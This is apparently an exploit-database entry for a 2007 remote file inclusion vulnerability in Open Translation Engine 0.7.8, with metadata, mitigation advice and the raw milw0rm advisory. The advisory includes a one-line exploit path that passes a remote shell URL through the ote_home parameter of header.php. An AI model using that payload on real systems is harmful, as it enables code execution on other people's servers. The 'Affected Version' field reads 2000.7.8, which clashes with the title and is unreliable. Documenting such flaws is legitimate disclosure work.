header-logo
Suggest Exploit
vendor:
Open Translation Engine (OTE)
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Open Translation Engine (OTE)
Affected Version From: 2000.7.8
Affected Version To: 2000.7.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Open Translation Engine (OTE) 0.7.8 (header.php ote_home) Remote File Include

The vulnerability allows an attacker to include a remote file in the header.php file of the Open Translation Engine (OTE) version 0.7.8. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of the Open Translation Engine (OTE) that does not have this vulnerability. Additionally, proper input validation and sanitization should be implemented to prevent remote file inclusion.
Source

Exploit-DB raw data:

# Open Translation Engine (OTE) 0.7.8 (header.php ote_home)Remote File Include
# D.Script: http://heanet.dl.sourceforge.net/sourceforge/ote/ote.0.7.8.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/skins/header.php?ote_home=Shell
# Greetz To: Tryag-Team .....##

# milw0rm.com [2007-05-03]

Navigation

Suggest Exploit

Services By CQR